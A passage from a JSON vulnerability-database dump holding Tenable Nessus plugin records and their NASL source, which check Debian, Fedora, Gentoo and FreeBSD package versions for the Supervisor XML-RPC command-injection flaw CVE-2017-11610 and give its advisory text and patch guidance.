available\nplugins are currently known that use nested namespaces. Plugins that\nuse a single namespace will continue to work as before. 
Details can be\nfound on the upstream issue at\nhttps://github.com/Supervisor/supervisor/issues/964 .\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=870187\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/Supervisor/supervisor/issues/964\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/supervisor\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/supervisor\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3942\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the supervisor packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 3.0r1-1+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 3.3.1-1+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"supervisor\", reference:\"3.0r1-1+deb8u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"supervisor\", reference:\"3.3.1-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"supervisor-doc\", reference:\"3.3.1-1+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:15", "description": "Security fix for CVE-2017-11610\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "nessus", "title": "Fedora 26 : supervisor (2017-307eab89e1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-11T00:00:00", "cpe": 
["p-cpe:/a:fedoraproject:fedora:supervisor", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-307EAB89E1.NASL", "href": "https://www.tenable.com/plugins/nessus/102246", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-307eab89e1.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102246);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-11610\");\n script_xref(name:\"FEDORA\", value:\"2017-307eab89e1\");\n\n script_name(english:\"Fedora 26 : supervisor (2017-307eab89e1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-11610\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-307eab89e1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected supervisor package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"supervisor-3.3.3-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"supervisor\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:04", "description": "Security fix for CVE-2017-11610\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-08-09T00:00:00", "type": "nessus", "title": "Fedora 25 : supervisor (2017-85eb9f7a36)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:supervisor", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-85EB9F7A36.NASL", "href": "https://www.tenable.com/plugins/nessus/102275", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-85eb9f7a36.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102275);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n 
script_cve_id(\"CVE-2017-11610\");\n script_xref(name:\"FEDORA\", value:\"2017-85eb9f7a36\");\n\n script_name(english:\"Fedora 25 : supervisor (2017-85eb9f7a36)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-11610\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-85eb9f7a36\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected supervisor package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"supervisor-3.2.4-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"supervisor\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:47", "description": "The remote host is affected by the vulnerability described in GLSA-201709-06 (Supervisor: command injection vulnerability)\n\n A vulnerability in Supervisor was discovered in which an authenticated client could send malicious XML-RPC requests and supervidord will run them as shell commands with process privileges. 
In some cases, supervisord is configured with root permissions.\n Impact :\n\n A remote attacker could execute arbitrary code with the privileges of the process.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2017-09-18T00:00:00", "type": "nessus", "title": "GLSA-201709-06 : Supervisor: command injection vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:supervisor", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201709-06.NASL", "href": "https://www.tenable.com/plugins/nessus/103274", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201709-06.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103274);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-11610\");\n script_xref(name:\"GLSA\", value:\"201709-06\");\n\n script_name(english:\"GLSA-201709-06 : Supervisor: command injection vulnerability\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201709-06\n(Supervisor: command injection vulnerability)\n\n A vulnerability in Supervisor was discovered in which an authenticated\n client could send malicious XML-RPC requests and supervidord will run\n them as shell commands with process privileges. 
In some cases,\n supervisord is configured with root permissions.\n \nImpact :\n\n A remote attacker could execute arbitrary code with the privileges of\n the process.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201709-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Supervisor users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '=app-admin/supervisor-3.1.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-admin/supervisor\", unaffected:make_list(\"ge 3.1.4\"), vulnerable:make_list(\"lt 3.1.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Supervisor\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:22", "description": "A vulnerability has been found in supervisor, a system for controlling process state, where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 3.0a8-1.1+deb7u2.\n\nWe recommend that you upgrade your supervisor packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-08-01T00:00:00", "type": "nessus", "title": "Debian DLA-1047-1 : supervisor security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:supervisor", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1047.NASL", "href": "https://www.tenable.com/plugins/nessus/102085", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1047-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102085);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-11610\");\n\n script_name(english:\"Debian DLA-1047-1 : supervisor security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found in supervisor, a system for controlling\nprocess state, where an authenticated client can send a malicious\nXML-RPC request to supervisord that will run arbitrary shell commands\non the server. The commands will be run as the same user as\nsupervisord.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.0a8-1.1+deb7u2.\n\nWe recommend that you upgrade your supervisor packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/07/msg00042.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/supervisor\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected supervisor package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"supervisor\", reference:\"3.0a8-1.1+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:16:50", "description": "mnaberez reports :\n\nsupervisord can be configured to run an HTTP server on a TCP socket and/or a Unix domain socket. The HTTP server is how supervisorctl communicates with supervisord. If an HTTP server has been enabled, it will always serve both HTML pages and an XML-RPC interface. A vulnerability has been found where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this may be root.\n\nThis vulnerability can only be exploited by an authenticated client or if supervisord has been configured to run an HTTP server without authentication. 
If authentication has not been enabled, supervisord will log a message at the critical level every time it starts.", "cvss3": {}, "published": "2017-08-16T00:00:00", "type": "nessus", "title": "FreeBSD : Supervisord -- An authenticated client can run arbitrary shell commands via malicious XML-RPC requests (c9460380-81e3-11e7-93af-005056925db4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:py27-supervisor", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_C946038081E311E793AF005056925DB4.NASL", "href": "https://www.tenable.com/plugins/nessus/102508", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102508);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-11610\");\n\n script_name(english:\"FreeBSD : Supervisord -- An authenticated client can run arbitrary shell commands via malicious XML-RPC requests (c9460380-81e3-11e7-93af-005056925db4)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"mnaberez reports :\n\nsupervisord can be configured to run an HTTP server on a TCP socket\nand/or a Unix domain socket. The HTTP server is how supervisorctl\ncommunicates with supervisord. If an HTTP server has been enabled, it\nwill always serve both HTML pages and an XML-RPC interface. A\nvulnerability has been found where an authenticated client can send a\nmalicious XML-RPC request to supervisord that will run arbitrary shell\ncommands on the server. The commands will be run as the same user as\nsupervisord. Depending on how supervisord has been configured, this\nmay be root.\n\nThis vulnerability can only be exploited by an authenticated client or\nif supervisord has been configured to run an HTTP server without\nauthentication. 
If authentication has not been enabled, supervisord\nwill log a message at the critical level every time it starts.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://supervisord.org/changes.html\"\n );\n # https://github.com/Supervisor/supervisor/issues/964#issuecomment-317551606\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?58123af6\"\n );\n # https://vuxml.freebsd.org/freebsd/c9460380-81e3-11e7-93af-005056925db4.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec8dcc03\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py27-supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", 